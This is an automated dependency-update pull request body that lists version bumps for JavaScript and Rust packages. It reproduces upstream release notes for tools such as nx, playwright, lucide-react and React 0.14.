| [playwright](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.46.1`](https://renovatebot.com/diffs/npm/playwright/1.44.1/1.46.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [react-refresh](https://reactjs.org/ ) ([source](https://togithub.com/facebook/react/tree/HEAD/packages/react )) | [`^0.10.0` -> `^0.14.0`](https://renovatebot.com/diffs/npm/react-refresh/0.10.0/0.14.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [serde](https://serde.rs ) ([source](https://togithub.com/serde-rs/serde )) | `1.0.204` -> `1.0.208` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [serde_json](https://togithub.com/serde-rs/json ) | `1.0.120` -> `1.0.125` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [storybook-dark-mode](https://togithub.com/hipstersmoothie/storybook-dark-mode ) | [`4.0.1` -> `4.0.2`](https://renovatebot.com/diffs/npm/storybook-dark-mode/4.0.1/4.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [tokio](https://tokio.rs ) ([source](https://togithub.com/tokio-rs/tokio )) | `1.38.0` -> `1.39.3` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dev-dependencies | minor |
| [tokio](https://tokio.rs ) ([source](https://togithub.com/tokio-rs/tokio )) | `1.38.0` -> `1.39.3` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | minor |
| [undici](https://undici.nodejs.org ) ([source](https://togithub.com/nodejs/undici )) | [`6.19.7` -> `6.19.8`](https://renovatebot.com/diffs/npm/undici/6.19.7/6.19.8 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [undici](https://undici.nodejs.org ) ([source](https://togithub.com/nodejs/undici )) | [`6.19.7` -> `6.19.8`](https://renovatebot.com/diffs/npm/undici/6.19.7/6.19.8 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [vite-plugin-dts](https://togithub.com/qmhc/vite-plugin-dts ) | [`4.0.2` -> `4.0.3`](https://renovatebot.com/diffs/npm/vite-plugin-dts/4.0.2/4.0.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
---
### Release Notes
<details>
<summary>fal-ai/fal-js (@​fal-ai/serverless-client)</summary>
### [`v0.14.2`](c3a3c3d21a...b3ab5f0e15 )
[Compare Source](c3a3c3d21a...b3ab5f0e15 )
### [`v0.14.1`](6edbf2948d...c3a3c3d21a )
[Compare Source](6edbf2948d...c3a3c3d21a )
### [`v0.14.0`](cf300e9cc0...6edbf2948d )
[Compare Source](cf300e9cc0...6edbf2948d )
</details>
<details>
<summary>napi-rs/napi-rs (@​napi-rs/cli)</summary>
### [`v3.0.0-alpha.62`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.61...@napi-rs/cli@3.0.0-alpha.62 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.61...@napi-rs/cli@3.0.0-alpha.62 )
### [`v3.0.0-alpha.61`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.60...@napi-rs/cli@3.0.0-alpha.61 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.60...@napi-rs/cli@3.0.0-alpha.61 )
</details>
<details>
<summary>nrwl/nx (@​nx/vite)</summary>
### [`v19.6.1`](https://togithub.com/nrwl/nx/releases/tag/19.6.1 )
[Compare Source](https://togithub.com/nrwl/nx/compare/19.6.0...19.6.1 )
##### 19.6.1 (2024-08-19)
##### 🚀 Features
- **core:** add shutdown lifecycle hook to node executor ([#​27354](https://togithub.com/nrwl/nx/pull/27354 ))
- **docs:** update OpenAI model to use gpt-4o-mini ([#​27434](https://togithub.com/nrwl/nx/pull/27434 ))
- **nx-dev:** add Explain with AI to Enterprise and Pro Plans ([#​27455](https://togithub.com/nrwl/nx/pull/27455 ))
- **nx-dev:** add Monorepo World banner to hero ([#​27482](https://togithub.com/nrwl/nx/pull/27482 ))
##### 🩹 Fixes
- **angular:** generate [@​nx/angular](https://togithub.com/nx/angular ) in devDependencies and move to dependencies when using runtime helpers ([#​27405](https://togithub.com/nrwl/nx/pull/27405 ))
- **angular:** module-federation-ssr-dev-server should call correct builder ([#​27477](https://togithub.com/nrwl/nx/pull/27477 ))
- **angular:** bump ngrx version to 18.0.2 ([#​27506](https://togithub.com/nrwl/nx/pull/27506 ))
- **js:** handle arbitrary nested ts path mappings when re-mapping them to the outputs ([#​27429](https://togithub.com/nrwl/nx/pull/27429 ))
- **linter:** update the [@​nx/dependency-checks](https://togithub.com/nx/dependency-checks ) rule to read the package.json content from the rule context ([#​27476](https://togithub.com/nrwl/nx/pull/27476 ))
- **misc:** ensure custom reporters are usable with [@​nx/playwright](https://togithub.com/nx/playwright ):playwright ([#​27443](https://togithub.com/nrwl/nx/pull/27443 ))
- **module-federation:** ensure target defaults are set correctly [#​27448](https://togithub.com/nrwl/nx/issues/27448 ) ([#​27472](https://togithub.com/nrwl/nx/pull/27472 ), [#​27448](https://togithub.com/nrwl/nx/issues/27448 ))
- **node:** build-esbuild-options.ts browser user define envs by config ([#​27480](https://togithub.com/nrwl/nx/pull/27480 ))
- **nx-dev:** Og image path generation ([#​27456](https://togithub.com/nrwl/nx/pull/27456 ))
- **nx-dev:** bad link from home page ([#​27475](https://togithub.com/nrwl/nx/pull/27475 ))
- **nx-dev:** fix use `key` instead of `env` to reference cache key in… ([#​26644](https://togithub.com/nrwl/nx/pull/26644 ))
- **react:** ensure [@​vitejs/plugin-react](https://togithub.com/vitejs/plugin-react ) is installed for storybook ([#​27463](https://togithub.com/nrwl/nx/pull/27463 ))
- **react:** enable vitejs-plugin-react-swc for swc compiler ([#​27457](https://togithub.com/nrwl/nx/pull/27457 ))
- **repo:** add dependsOn to native build ([#​27446](https://togithub.com/nrwl/nx/pull/27446 ))
- **testing:** fix misc issues in migrations ([#​27471](https://togithub.com/nrwl/nx/pull/27471 ))
##### ❤️ Thank You
- [@​NgDaddy](https://togithub.com/NgDaddy ) [@​NgDaddy](https://togithub.com/NgDaddy )
- Benjamin Cabanes [@​bcabanes](https://togithub.com/bcabanes )
- Colum Ferry [@​Coly010](https://togithub.com/Coly010 )
- EGonz1PCTY
- Isaac Mann [@​isaacplmann](https://togithub.com/isaacplmann )
- Jason Jean [@​FrozenPandaz](https://togithub.com/FrozenPandaz )
- Jonathan Cammisuli
- Kamenskih Dmitriy
- Leosvel Pérez Espinosa [@​leosvelperez](https://togithub.com/leosvelperez )
- Nicholas Cunningham [@​ndcunningham](https://togithub.com/ndcunningham )
- Tine Kondo [@​tinesoft](https://togithub.com/tinesoft )
- Wei Liang [@​weiliang79](https://togithub.com/weiliang79 )
</details>
<details>
<summary>microsoft/playwright (@​playwright/test)</summary>
### [`v1.46.1`](https://togithub.com/microsoft/playwright/compare/v1.46.0...e1c861cfa7a6caf3c5b798786b1e6298c4f3cf31 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.46.0...v1.46.1 )
### [`v1.46.0`](https://togithub.com/microsoft/playwright/compare/v1.45.3...99a36310570617222290c09b96a2026beb8b00f9 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.45.3...v1.46.0 )
### [`v1.45.3`](https://togithub.com/microsoft/playwright/compare/v1.45.2...0e130fa8edaf85765c4a5a86bded0e6d33bfd7c2 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.45.2...v1.45.3 )
### [`v1.45.2`](https://togithub.com/microsoft/playwright/compare/v1.45.1...d8a5f3b33193e413b404ff4aa1f71e859d8f1b6b )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.45.1...v1.45.2 )
### [`v1.45.1`](https://togithub.com/microsoft/playwright/compare/v1.45.0...e8989f83d9801cdaadc3803b5341c601c9593947 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.45.0...v1.45.1 )
### [`v1.45.0`](https://togithub.com/microsoft/playwright/compare/v1.44.1...4f3f6eecae490af444dd9298c9eaeb0c596915b7 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.44.1...v1.45.0 )
</details>
<details>
<summary>swc-project/swc (@​swc/core)</summary>
### [`v1.7.14`](https://togithub.com/swc-project/swc/blob/HEAD/CHANGELOG.md#1714---2024-08-19 )
[Compare Source](https://togithub.com/swc-project/swc/compare/v1.7.12...v1.7.14 )
##### Bug Fixes
- **(common)** Use `SourceMap::adjust_mappings` in correct order ([#​9447](https://togithub.com/swc-project/swc/issues/9447 )) ([05961eb](05961eb018 ))
- **(es)** Preserve more comments ([#​9449](https://togithub.com/swc-project/swc/issues/9449 )) ([673655c](673655c169 ))
##### Features
- **(es/decorators)** Groundwork for stage 3 decorator ([#​9450](https://togithub.com/swc-project/swc/issues/9450 )) ([238ba8b](238ba8b1d2 ))
##### Refactor
- **(visit)** Remove `VisitAll` ([#​9448](https://togithub.com/swc-project/swc/issues/9448 )) ([8845b76](8845b76ac4 ))
</details>
<details>
<summary>i18next/i18next (i18next)</summary>
### [`v23.14.0`](https://togithub.com/i18next/i18next/blob/HEAD/CHANGELOG.md#23140 )
[Compare Source](https://togithub.com/i18next/i18next/compare/v23.13.0...v23.14.0 )
- If backend errors with retry flag, set internal state to 0, so reloadingResources should work [147](https://togithub.com/i18next/i18next-http-backend/issues/147 )
</details>
<details>
<summary>lucide-icons/lucide (lucide-react)</summary>
### [`v0.428.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.428.0 ): New icons 0.428.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.427.0...0.428.0 )
#### New icons 🎨
- `tickets-plane` ([#​2196](https://togithub.com/lucide-icons/lucide/issues/2196 )) by [@​jguddas](https://togithub.com/jguddas )
#### Modified Icons 🔨
- `folder-search` ([#​2354](https://togithub.com/lucide-icons/lucide/issues/2354 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.427.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.427.0 ): New icons 0.427.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.426.0...0.427.0 )
#### New icons 🎨
- `binoculars` ([#​2207](https://togithub.com/lucide-icons/lucide/issues/2207 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `tickets` ([#​2335](https://togithub.com/lucide-icons/lucide/issues/2335 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.426.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.426.0 ): New icons 0.426.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.425.0...0.426.0 )
#### New icons 🎨
- `chevrons-left-right-ellipsis` ([#​2120](https://togithub.com/lucide-icons/lucide/issues/2120 )) by [@​ericfennis](https://togithub.com/ericfennis )
- `ethernet-port` ([#​2120](https://togithub.com/lucide-icons/lucide/issues/2120 )) by [@​ericfennis](https://togithub.com/ericfennis )
#### Modified Icons 🔨
- `cigarette-off` ([#​2282](https://togithub.com/lucide-icons/lucide/issues/2282 )) by [@​jguddas](https://togithub.com/jguddas )
- `cigarette` ([#​2282](https://togithub.com/lucide-icons/lucide/issues/2282 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.425.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.425.0 ): New icons 0.425.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.424.0...0.425.0 )
#### New icons 🎨
- `bandage` ([#​2341](https://togithub.com/lucide-icons/lucide/issues/2341 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `table-of-contents` ([#​2348](https://togithub.com/lucide-icons/lucide/issues/2348 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `mouse-pointer-2` ([#​2350](https://togithub.com/lucide-icons/lucide/issues/2350 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `mouse-pointer-ban` ([#​2350](https://togithub.com/lucide-icons/lucide/issues/2350 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `mouse-pointer-click` ([#​2350](https://togithub.com/lucide-icons/lucide/issues/2350 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `mouse-pointer` ([#​2350](https://togithub.com/lucide-icons/lucide/issues/2350 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `square-dashed-mouse-pointer` ([#​2350](https://togithub.com/lucide-icons/lucide/issues/2350 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `square-mouse-pointer` ([#​2350](https://togithub.com/lucide-icons/lucide/issues/2350 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.424.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.424.0 ): New icons 0.424.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.423.0...0.424.0 )
#### New icons 🎨
- `map-pin-house` ([#​2337](https://togithub.com/lucide-icons/lucide/issues/2337 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `replace-all` ([#​2333](https://togithub.com/lucide-icons/lucide/issues/2333 )) by [@​jguddas](https://togithub.com/jguddas )
- `replace` ([#​2333](https://togithub.com/lucide-icons/lucide/issues/2333 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.423.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.423.0 ): New icons 0.423.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.422.0...0.423.0 )
#### New icons 🎨
- `amphora` ([#​1926](https://togithub.com/lucide-icons/lucide/issues/1926 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.422.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.422.0 ): New icons 0.422.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.421.0...0.422.0 )
#### Modified Icons 🔨
- `skull` ([#​2197](https://togithub.com/lucide-icons/lucide/issues/2197 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.421.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.421.0 ): New icons 0.421.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.420.0...0.421.0 )
#### New icons 🎨
- `microchip` ([#​1982](https://togithub.com/lucide-icons/lucide/issues/1982 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `circle-check-big` ([#​2330](https://togithub.com/lucide-icons/lucide/issues/2330 )) by [@​jguddas](https://togithub.com/jguddas )
- `cloud-download` ([#​2355](https://togithub.com/lucide-icons/lucide/issues/2355 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `pentagon` ([#​1918](https://togithub.com/lucide-icons/lucide/issues/1918 )) by [@​jguddas](https://togithub.com/jguddas )
- `square-check-big` ([#​2331](https://togithub.com/lucide-icons/lucide/issues/2331 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.420.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.420.0 ): New icons 0.420.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.419.0...0.420.0 )
#### New icons 🎨
- `omega` ([#​2347](https://togithub.com/lucide-icons/lucide/issues/2347 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `calendar-search` ([#​2351](https://togithub.com/lucide-icons/lucide/issues/2351 )) by [@​jguddas](https://togithub.com/jguddas )
- `cloud-upload` ([#​2352](https://togithub.com/lucide-icons/lucide/issues/2352 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.419.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.419.0 ): New icons 0.419.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.418.0...0.419.0 )
#### New icons 🎨
- `circle-fading-arrow-up` ([#​2287](https://togithub.com/lucide-icons/lucide/issues/2287 )) by [@​mosch](https://togithub.com/mosch )
### [`v0.418.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.418.0 ): New icons 0.418.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.417.0...0.418.0 )
#### New icons 🎨
- `id-card` ([#​1296](https://togithub.com/lucide-icons/lucide/issues/1296 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.417.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.417.0 ): New icons 0.417.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.416.0...0.417.0 )
#### Modified Icons 🔨
- `chart-column-increasing` ([#​2334](https://togithub.com/lucide-icons/lucide/issues/2334 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.416.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.416.0 ): New icons 0.416.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.415.0...0.416.0 )
#### New icons 🎨
- `map-pin-check-inside` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-check` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-minus-inside` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-minus` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-plus-inside` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-plus` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-x-inside` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-x` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `map-pin-off` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pinned` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.415.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.415.0 ): New icons 0.415.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.414.0...0.415.0 )
#### New icons 🎨
- `square-square` ([#​2241](https://togithub.com/lucide-icons/lucide/issues/2241 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.414.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.414.0 ): New icons 0.414.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.413.0...0.414.0 )
#### New icons 🎨
- `chart-area` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-bar-decreasing` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-bar-increasing` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-bar-stacked` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-column-big` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-column-increasing` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-column-stacked` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-network` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-no-axes-combined` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-spline` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.413.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.413.0 ): New icons 0.413.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.412.0...0.413.0 )
#### New icons 🎨
- `dam` ([#​2233](https://togithub.com/lucide-icons/lucide/issues/2233 )) by [@​AndreasSas](https://togithub.com/AndreasSas )
#### Modified Icons 🔨
- `dog` ([#​2249](https://togithub.com/lucide-icons/lucide/issues/2249 )) by [@​jguddas](https://togithub.com/jguddas )
- `key-square` ([#​2277](https://togithub.com/lucide-icons/lucide/issues/2277 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.412.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.412.0 ): New icons 0.412.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.411.0...0.412.0 )
#### New icons 🎨
- `letter-text` ([#​2252](https://togithub.com/lucide-icons/lucide/issues/2252 )) by [@​GRA0007](https://togithub.com/GRA0007 )
### [`v0.411.0`](https://togithub.com/lucide-icons/lucide/compare/0.410.0...0.411.0 )
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.410.0...0.411.0 )
### [`v0.410.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.410.0 ): New icons 0.410.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.409.0...0.410.0 )
#### New icons 🎨
- `philippine-peso` ([#​2231](https://togithub.com/lucide-icons/lucide/issues/2231 )) by [@​kasutu](https://togithub.com/kasutu )
#### Modified Icons 🔨
- `ribbon` ([#​2271](https://togithub.com/lucide-icons/lucide/issues/2271 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.409.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.409.0 ): New icons 0.409.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.408.0...0.409.0 )
#### Modified Icons 🔨
- `calendar-minus` ([#​2265](https://togithub.com/lucide-icons/lucide/issues/2265 )) by [@​jguddas](https://togithub.com/jguddas )
- `eye-off` ([#​2317](https://togithub.com/lucide-icons/lucide/issues/2317 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `eye` ([#​2317](https://togithub.com/lucide-icons/lucide/issues/2317 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `image-plus` ([#​2321](https://togithub.com/lucide-icons/lucide/issues/2321 )) by [@​jguddas](https://togithub.com/jguddas )
- `scan-eye` ([#​2317](https://togithub.com/lucide-icons/lucide/issues/2317 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `view` ([#​2317](https://togithub.com/lucide-icons/lucide/issues/2317 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
</details>
<details>
<summary>webpack-contrib/mini-css-extract-plugin (mini-css-extract-plugin)</summary>
### [`v2.9.1`](https://togithub.com/webpack-contrib/mini-css-extract-plugin/blob/HEAD/CHANGELOG.md#291-2024-08-19 )
[Compare Source](https://togithub.com/webpack-contrib/mini-css-extract-plugin/compare/v2.9.0...v2.9.1 )
</details>
<details>
<summary>nodejs/node (node)</summary>
### [`v20.16.0`](https://togithub.com/nodejs/node/compare/v20.15.1...v20.16.0 )
[Compare Source](https://togithub.com/nodejs/node/compare/v20.15.1...v20.16.0 )
</details>
<details>
<summary>facebook/react (react-refresh)</summary>
### [`v0.14.2`](https://togithub.com/facebook/react/blob/HEAD/CHANGELOG.md#0142-November-2-2015 )
[Compare Source](https://togithub.com/facebook/react/compare/v0.14.1...v0.14.2 )
##### React DOM
- Fixed bug with development build preventing events from firing in some versions of Internet Explorer & Edge
- Fixed bug with development build when using es5-sham in older versions of Internet Explorer
- Added support for `integrity` attribute
- Fixed bug resulting in `children` prop being coerced to a string for custom elements, which was not the desired behavior
- Moved `react` from `dependencies` to `peerDependencies` to match expectations and align with `react-addons-*` packages
### [`v0.14.1`](https://togithub.com/facebook/react/blob/HEAD/CHANGELOG.md#01410-October-14-2020 )
[Compare Source](https://togithub.com/facebook/react/compare/v0.14.0...v0.14.1 )
##### React
- Backport support for the [new JSX transform](https://reactjs.org/blog/2020/09/22/introducing-the-new-jsx-transform.html ) to 0.14.x. ([@​lunaruan](https://togithub.com/lunaruan ) in [#​18299](https://togithub.com/facebook/react/pull/18299 ) and [@​gaearon](https://togithub.com/gaearon ) in [#​20024](https://togithub.com/facebook/react/pull/20024 ))
### [`v0.14.0`](https://togithub.com/facebook/react/blob/HEAD/CHANGELOG.md#0140-October-7-2015 )
[Compare Source](https://togithub.com/facebook/react/compare/v0.13.0...v0.14.0 )
##### Major changes
- Split the main `react` package into two: `react` and `react-dom`. This paves the way to writing components that can be shared between the web version of React and React Native. This means you will need to include both files and some functions have been moved from `React` to `ReactDOM`.
- Addons have been moved to separate packages (`react-addons-clone-with-props`, `react-addons-create-fragment`, `react-addons-css-transition-group`, `react-addons-linked-state-mixin`, `react-addons-perf`, `react-addons-pure-render-mixin`, `react-addons-shallow-compare`, `react-addons-test-utils`, `react-addons-transition-group`, `react-addons-update`, `ReactDOM.unstable_batchedUpdates`).
- Stateless functional components - React components were previously created using React.createClass or using ES6 classes. This release adds a [new syntax](https://reactjs.org/docs/reusable-components.html#stateless-functions ) where a user defines a single [stateless render function](https://reactjs.org/docs/reusable-components.html#stateless-functions ) (with one parameter: `props`) which returns a JSX element, and this function may be used as a component.
- Refs to DOM components as the DOM node itself. Previously the only useful thing you can do with a DOM component is call `getDOMNode()` to get the underlying DOM node. Starting with this release, a ref to a DOM component *is* the actual DOM node. **Note that refs to custom (user-defined) components work exactly as before; only the built-in DOM components are affected by this change.**
##### Breaking changes
- `React.initializeTouchEvents` is no longer necessary and has been removed completely. Touch events now work automatically.
- Add-Ons: Due to the DOM node refs change mentioned above, `TestUtils.findAllInRenderedTree` and related helpers are no longer able to take a DOM component, only a custom component.
- The `props` object is now frozen, so mutating props after creating a component element is no longer supported. In most cases, [`React.cloneElement`](https://reactjs.org/docs/react-api.html#cloneelement ) should be used instead. This change makes your components easier to reason about and enables the compiler optimizations mentioned above.
- Plain objects are no longer supported as React children; arrays should be used instead. You can use the [`createFragment`](https://reactjs.org/docs/create-fragment.html ) helper to migrate, which now returns an array.
- Add-Ons: `classSet` has been removed. Use [classnames](https://togithub.com/JedWatson/classnames ) instead.
- Web components (custom elements) now use native property names. Eg: `class` instead of `className`.
##### Deprecations
- `this.getDOMNode()` is now deprecated and `ReactDOM.findDOMNode(this)` can be used instead. Note that in the common case, `findDOMNode` is now unnecessary since a ref to the DOM component is now the actual DOM node.
- `setProps` and `replaceProps` are now deprecated. Instead, call ReactDOM.render again at the top level with the new props.
- ES6 component classes must now extend `React.Component` in order to enable stateless function components. The [ES3 module pattern](https://reactjs.org/blog/2015/01/27/react-v0.13.0-beta-1.html#other-languages ) will continue to work.
- Reusing and mutating a `style` object between renders has been deprecated. This mirrors our change to freeze the `props` object.
- Add-Ons: `cloneWithProps` is now deprecated. Use [`React.cloneElement`](https://reactjs.org/docs/react-api.html#cloneelement ) instead (unlike `cloneWithProps`, `cloneElement` does not merge `className` or `style` automatically; you can merge them manually if needed).
- Add-Ons: To improve reliability, `CSSTransitionGroup` will no longer listen to transition events. Instead, you should specify transition durations manually using props such as `transitionEnterTimeout={500}`.
##### Notable enhancements
- Added `React.Children.toArray` which takes a nested children object and returns a flat array with keys assigned to each child. This helper makes it easier to manipulate collections of children in your `render` methods, especially if you want to reorder or slice `this.props.children` before passing it down. In addition, `React.Children.map` now returns plain arrays too.
